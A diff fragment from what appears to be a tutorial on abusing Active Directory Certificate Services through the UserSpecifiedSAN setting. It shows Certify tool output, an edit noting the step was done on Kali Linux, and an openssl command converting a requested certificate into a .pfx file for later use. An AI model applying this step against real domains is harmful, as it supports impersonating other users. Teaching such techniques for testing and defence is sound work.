vanhohen/ADNinja/Tutorials/AD CS UserSpecifiedSAN.md

 	Certify completed in 00:00:04.6491198

-Save RSA KEY and Certificate to a file called "cert.pem" and convert it to cert.pfx
+Save RSA KEY and Certificate to a file called "cert.pem" and convert it to cert.pfx (i made this in kali linux machine)

 	openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx